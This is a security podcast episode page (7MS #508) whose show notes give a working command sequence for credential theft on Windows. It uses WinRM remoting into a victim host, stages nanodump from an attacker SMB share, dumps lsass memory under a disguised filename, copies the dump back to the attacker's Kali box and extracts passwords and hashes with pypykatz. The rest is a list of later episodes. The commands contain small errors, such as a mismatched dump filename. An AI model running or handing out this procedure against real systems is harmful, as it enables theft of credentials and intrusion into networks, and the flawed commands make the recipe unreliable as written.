7MS #508: Tales of Pentest Pwnage - Part 33
7 Minute Security18 Feb 2022

7MS #508: Tales of Pentest Pwnage - Part 33

Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.

We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:

# Windows system: tell your Windows system to trust the victim host you're about to PS into: winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"} # Windows system: PowerShell into the victim system Enter-PSSession -computername -Credential domain.com\pwneduser # Kali system: create and share a folder with nanodump.exe in it: sudo mkdir /share sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support # Victim system: copy nanodump from Kali box to VICTIM-SERVER copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\ # Victim system: get the PID for lsass.exe tasklist /FI "IMAGENAME eq lsass.exe" # Victim system: use nano to do the lsass dump c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log # Victim system: Get the log back to your Kali share copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRSS\share\ # Kali system: "fix" the dump and extract credz with mimikatz! sudo /opt/nanodump/restore_signature.sh winupdates1.log sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt

Enjoy delicious passwords and hashes in the dump.txt file!

Episoder(719)

7MS #687: A Peek into the 7MS Mail Bag – Part 5

7MS #687: A Peek into the 7MS Mail Bag – Part 5

Hi friends, we're doing something today we haven't done in a hot minute: take a dip into the 7MinSec mail bag! Today we cover these questions: If I'm starting a solo business venture as a security co...

11 Aug 202557min

7MS #686: Our New Pentest Training Course is Almost Ready

7MS #686: Our New Pentest Training Course is Almost Ready

Oh man, I'm so excited I can hardly sleep. Our new three-day (4 hours per day) training is getting closer to general release. I talk about the good/bad/ugly of putting together an attack-sensitive lab...

1 Aug 202523min

7MS #685: The Time My Neighbor Almost Got Scammed Out of $13K

7MS #685: The Time My Neighbor Almost Got Scammed Out of $13K

Today's kind of a "story time with your friend Brian" episode: a tale of how my neighbor almost got scammed out of $13k. The story has a lot of red flags we can all keep in mind to keep ourselves (as...

25 Jul 202522min

7MS #684: Pwning Ninja Hacker Academy

7MS #684: Pwning Ninja Hacker Academy

Hey friends, today we start pwning Ninja Hacker Academy – cool CTF-style lab that has you start with no cred and try to conquer domain admin on two domains!

18 Jul 202522min

7MS #683: What I'm Working on This Week - Part 4

7MS #683: What I'm Working on This Week - Part 4

This week I'm working on a mixed bag of fun security and marketing things: A pentest I'm stuck on My latest lab CTF obsession: Ninja Hacker Academy A cool "about 7MinSec" marketing video that was rec...

12 Jul 202530min

7MS #682: Securing Your Family During and After a Disaster – Part 7

7MS #682: Securing Your Family During and After a Disaster – Part 7

Today's episode is a downer! We talk about things you might want to have buttoned up for when you are eventually not alive anymore: Living will Buried vs. cremated? Funeral plans Funeral PHOTOS? I a...

4 Jul 202530min

7MS #681: Pentesting GOAD – Part 3

7MS #681: Pentesting GOAD – Part 3

Today Joe "The Machine" Skeen and I pwn the third and final realm in the world of GOAD (Game of Active Directory): essos.local! The way we go about it is to do a WinRM connection to our previously-pw...

27 Jun 202518min

7MS #680: Tips for a Better Purple Team Experience

7MS #680: Tips for a Better Purple Team Experience

Today I share some tips on creating a better purple team experience for your customers, including: Setting up communication channels and cadence Giving a heads-up on highs/criticals during testing (n...

20 Jun 202526min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
aftenpodden-usa
forklart
popradet
stopp-verden
fotballpodden-2
lydartikler-fra-aftenposten
rss-gukild-johaug
det-store-bildet
nokon-ma-ga
dine-penger-pengeradet
rss-ness
hanna-de-heldige
aftenbla-bla
rss-espen-lee-usensurert
rss-penger-polser-og-politikk
e24-podden
rss-dannet-uten-piano
frokostshowet-pa-p5